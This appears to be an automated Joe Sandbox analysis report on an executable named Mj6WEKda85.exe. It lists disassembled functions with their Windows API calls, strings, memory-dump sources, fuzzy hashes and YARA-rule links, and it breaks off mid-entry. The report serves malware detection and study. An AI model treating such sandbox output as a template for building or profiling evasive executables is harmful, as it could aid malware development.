SendMessageW.USER32(00000000,000000C2,00000000,0089431C), ref: 0087CC76

Strings

\, xrefs: 0087CBCF

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 35abf2ff6a57b06f4ba40bef55690454c9b1e852a480a3b5f5f1f08110ef9fdb
Instruction ID: fdd407faeec8f01993c964d81aed6253e8b172ad9516a04abfc9370d00cb1955
Opcode Fuzzy Hash: 35abf2ff6a57b06f4ba40bef55690454c9b1e852a480a3b5f5f1f08110ef9fdb
Instruction Fuzzy Hash: 0331BE71185751ABE301DF209C4AFAB7EBCFB86744F000529F651D62D1DB749908C7BA

Function 0087CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 0087CF54
ShowWindow.USER32(?,00000000), ref: 0087CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 0087CFCF
CloseHandle.KERNEL32(?), ref: 0087CFF5
ShowWindow.USER32(?,00000001), ref: 0087D084

Part of subcall function 008717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0086BB05,00000000,.exe,?,?,00000800,?,?,008785DF,?), ref: 008717C2

Strings

.exe, xrefs: 0087CFFF
.inf, xrefs: 0087CF10
, xrefs: 0087CEA2

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 85d903fa30884fa952b745506bbdbd5b7aee5f85f3c2203c92e3cc6935712d6f
Instruction ID: 1389caf863a1883cfcb1136cb217460fcd7cb1de3159313c70845ccfbedd9037
Opcode Fuzzy Hash: 85d903fa30884fa952b745506bbdbd5b7aee5f85f3c2203c92e3cc6935712d6f
Instruction Fuzzy Hash: 0061AB71408780AADB319F24D814AABBBF9FF85304F08881EF5C9D7259DBB1D985CB52

Function 0088A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00884E35,00884E35,?,?,?,0088A2A9,00000001,00000001,3FE85006), ref: 0088A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0088A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0088A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0088A232
__freea.LIBCMT ref: 0088A23F

Part of subcall function 00888518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0088C13D,00000000,?,008867E2,?,00000008,?,008889AD,?,?,?), ref: 0088854A

__freea.LIBCMT ref: 0088A248
__freea.LIBCMT ref: 0088A26D

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: aa6b3c354cee151e690f9f25b637fb0d1dbfcee9f72599a54ec49cd94e161937
Instruction ID: ba8c545fbd58a7527dcdfaacaf88180a8cf75c8c60bd0a8d963476aa5d790923
Opcode Fuzzy Hash: aa6b3c354cee151e690f9f25b637fb0d1dbfcee9f72599a54ec49cd94e161937
Instruction Fuzzy Hash: 0A51BF72610216AEFB39AF68CC45EBB77A9FB44760F14422AFD05D6190EB35DC4087A2

Function 0087A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0087A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0087A315

Part of subcall function 008717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0086BB05,00000000,.exe,?,?,00000800,?,?,008785DF,?), ref: 008717C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0087A305

Strings

@Ut, xrefs: 0087A315
EDIT, xrefs: 0087A2E9, 0087A2F4, 0087A301

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 47f93b3f871000fd29ebc33d2536920eb4d5a1cb0b3cbd306576c73777b3ef9b
Instruction ID: 2c9ce4d1748f1cba9e372842077b96738d5d264e69096aebc125cae2e8970c88
Opcode Fuzzy Hash: 47f93b3f871000fd29ebc33d2536920eb4d5a1cb0b3cbd306576c73777b3ef9b
Instruction Fuzzy Hash: 23F08232A016287BEB206A689C09F9F776CFB86B50F044156BE49E22C4D770D945C6F6

Function 0087A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00870085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008700A0
Part of subcall function 00870085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0086EB86,Crypt32.dll,00000000,0086EC0A,?,?,0086EBEC,?,?,?), ref: 008700C2

OleInitialize.OLE32(00000000), ref: 0087A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0087A385
SHGetMalloc.SHELL32(008A8430), ref: 0087A38F

Strings

riched20.dll, xrefs: 0087A33D
3Qo, xrefs: 0087A366

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: da2f4bb37d9a949306ca9e9c485bab96fcf1333790ba3828398854a7ed626cc1
Instruction ID: 33d414d867a77a61b3b81310e4840bc779e7fb2e1e1fd2efad2ecaf7dfc589a5
Opcode Fuzzy Hash: da2f4bb37d9a949306ca9e9c485bab96fcf1333790ba3828398854a7ed626cc1
Instruction Fuzzy Hash: 28F0F9B1D00209ABDB10AF99D8499EFFBFCFF95711F00415BE818E2241DBB856058FA1

Function 008699B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008678AD,?,00000005,?,00000011), ref: 00869A4C
GetLastError.KERNEL32(?,?,008678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00869A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008678AD,?,00000005,?), ref: 00869A8E
GetLastError.KERNEL32(?,?,008678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00869A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00869ADB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 12da070a1ab99c34e55461ae3fd7294800691d709b5f4e1c6aaed3871e837add
Instruction ID: 0b510c30ad5d11fbfa07835cf3ef9c2f07177f30d8136fb56a963c54be9a1b39
Opcode Fuzzy Hash: 12da070a1ab99c34e55461ae3fd7294800691d709b5f4e1c6aaed3871e837add
Instruction Fuzzy Hash: 43419630544B566FE3209F64CC05BDABBD8FB01324F11071AF9E4D61D1E7B5A988CB92

Function 0087AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0087AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0087AC96
IsDialogMessageW.USER32(0001043E,?), ref: 0087ACAA
TranslateMessage.USER32(?), ref: 0087ACB8
DispatchMessageW.USER32(?), ref: 0087ACC2

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 083873bb29510678a720fe1c68e100048263efafdbf40fffd66bfed03126c4af
Instruction ID: 26149b4721ea433d33ebb7ab14b1f58209e76f60c8a3034265c5960b9903feaa
Opcode Fuzzy Hash: 083873bb29510678a720fe1c68e100048263efafdbf40fffd66bfed03126c4af
Instruction Fuzzy Hash: 96F0BD71902229AB8B249BE59C4CDEF7F7CFE45251B408516F519D2150EA34D505CBB1

Function 008876BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\Mj6WEKda85.exe,00000104), ref: 008876FD
_free.LIBCMT ref: 008877C8
_free.LIBCMT ref: 008877D2

Strings

C:\Users\user\Desktop\Mj6WEKda85.exe, xrefs: 008876F4, 008876FB, 0088772A, 00887762

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Mj6WEKda85.exe
API String ID: 2506810119-3708972283
Opcode ID: 996fccefe26d8277f04ebd73c3f2eb9cec39e1b0beaea3c1899415624e0b5b5b
Instruction ID: 47ea3b910520f8dbeab5364002c98413e6b1b9aae1edef3c5d78900f229a3b74
Opcode Fuzzy Hash: 996fccefe26d8277f04ebd73c3f2eb9cec39e1b0beaea3c1899415624e0b5b5b
Instruction Fuzzy Hash: 77315C71A08218EFDB21FB999D85DAEBBFCFB95710B2440A6E904D7211D6708E40CBA1

Function 0086984E Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0086985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00869876
GetLastError.KERNEL32 ref: 008698A8
GetLastError.KERNEL32 ref: 008698C7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 9c44aa156f0ee59147a7dfc01f712f9929fcf282a9e3059165aa6dc03c6efb05
Instruction ID: 50ef7a0ebe3de01d7c8e8322dd9196bf2fabd661d7bf2f6cb6bf4710ec72997a
Opcode Fuzzy Hash: 9c44aa156f0ee59147a7dfc01f712f9929fcf282a9e3059165aa6dc03c6efb05
Instruction Fuzzy Hash: 68118E30900608EBDB209B55C804A7977ADFB06771F16853AF8AAC7AD0DB359E449F52

Function 0088A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0086CFE0,00000000,00000000,?,0088A49B,0086CFE0,00000000,00000000,00000000,?,0088A698,00000006,FlsSetValue), ref: 0088A526
GetLastError.KERNEL32(?,0088A49B,0086CFE0,00000000,00000000,00000000,?,0088A698,00000006,FlsSetValue,00897348,00897350,00000000,00000364,?,00889077), ref: 0088A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0088A49B,0086CFE0,00000000,00000000,00000000,?,0088A698,00000006,FlsSetValue,00897348,00897350,00000000), ref: 0088A540

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 66f31d2f937f6a836e1b4d0fa35d0ecfb68786cfad330d4c5ae96c515e5b8f3c
Instruction ID: 400e8584fce80bcab6c65a85058f2803642734cc9bbbe8eb0d506edea1fa4ee2
Opcode Fuzzy Hash: 66f31d2f937f6a836e1b4d0fa35d0ecfb68786cfad330d4c5ae96c515e5b8f3c
Instruction Fuzzy Hash: B0014732601626ABD724AAA89C44A567B9CFF01BA1B240123F906D31C0D731ED40C7E1

Function 00869F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0086CC94,00000001,?,?,?,00000000,00874ECD,?,?,?), ref: 00869F4C
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00874ECD,?,?,?,?,?,00874972,?), ref: 00869F8E
WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0086CC94,00000001,?,?), ref: 00869FB8

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 81abf575e66c86ed3803f6a8e541379977fd840e8aac9ee12b4de299a49c4746
Instruction ID: 1d99136300679c6996f7d2a8daca78ec8764d5d80209fd14c34b10ba798cf971
Opcode Fuzzy Hash: 81abf575e66c86ed3803f6a8e541379977fd840e8aac9ee12b4de299a49c4746
Instruction Fuzzy Hash: 76310031208305DBDF149F24D848B6ABBA8FB91714F06461AF985EB2C1CB71DD48CBA3

Function 0086A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A261
GetLastError.KERNEL32(?,?,?,?,0086A113,?,00000001,00000000,?,?), ref: 0086A27E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: a26ad5df18676d82d628bb3aadb8cd93fff8f36f7b2ab58e8bf985978ca3332c
Instruction ID: 599a98bb9198facd5f4800b072e2082e1da905f753b00e57f1180ad56ad2971a
Opcode Fuzzy Hash: a26ad5df18676d82d628bb3aadb8cd93fff8f36f7b2ab58e8bf985978ca3332c
Instruction Fuzzy Hash: 7D01D63118051866DB3AAB698C55BED7348FF07741F054451F905F6251D751CA80CEA3

Function 0088AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0088B019

Strings

, xrefs: 0088B05E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: bbfca4461e4aae45bf96e493be4cb4a9a5edc9a844bd7a60307244a5ae5e1725
Instruction ID: bed55a28da3f0d91c4a2e2226c94164bbce19cc386810cfe2ae1a0e54df5de79
Opcode Fuzzy Hash: bbfca4461e4aae45bf96e493be4cb4a9a5edc9a844bd7a60307244a5ae5e1725
Instruction Fuzzy Hash: DE41287450474C9ADF229E68CC94AF7BBA9FB85308F1404EDE59AC7142D335AA45CF20

Function 0088A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0088A79D

Strings

LCMapStringEx, xrefs: 0088A73D, 0088A747

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: b2343c63a3fa1e51dd47083dbb52354660e6d42ca01551af00bced6198b48500
Instruction ID: fc8961559d7c39e3c7998f318af7fbee398d0fd67b94c3ffa9dc55892da423e3
Opcode Fuzzy Hash: b2343c63a3fa1e51dd47083dbb52354660e6d42ca01551af00bced6198b48500
Instruction Fuzzy Hash: 8B01133250420CBBCF06AFA4DC01DAE3F66FF08714F084155FE28A5260CA368A31FB92

Function 0088A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00889D2F), ref: 0088A715

Strings

InitializeCriticalSectionEx, xrefs: 0088A6E5

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: ecef2e333f93c40f1fc6ebf508b19921bd6a9035413b9659561881a42893be93
Instruction ID: 954dff39e7543fd2fbfe34f1e8031e3c942ab738b4aec88658411571d1c8ff8c
Opcode Fuzzy Hash: ecef2e333f93c40f1fc6ebf508b19921bd6a9035413b9659561881a42893be93
Instruction Fuzzy Hash: 40F0903164520CBBCF067F64CC05C9E7F61FB54720B484056FC1996260DA724A10B791

Function 0088A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0088A5AE

Strings

FlsAlloc, xrefs: 0088A58A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: c8a4a27e47251ba2ea891bf4c93abdb2dba2ca09b0f51f1648cd8080eabf8d4e
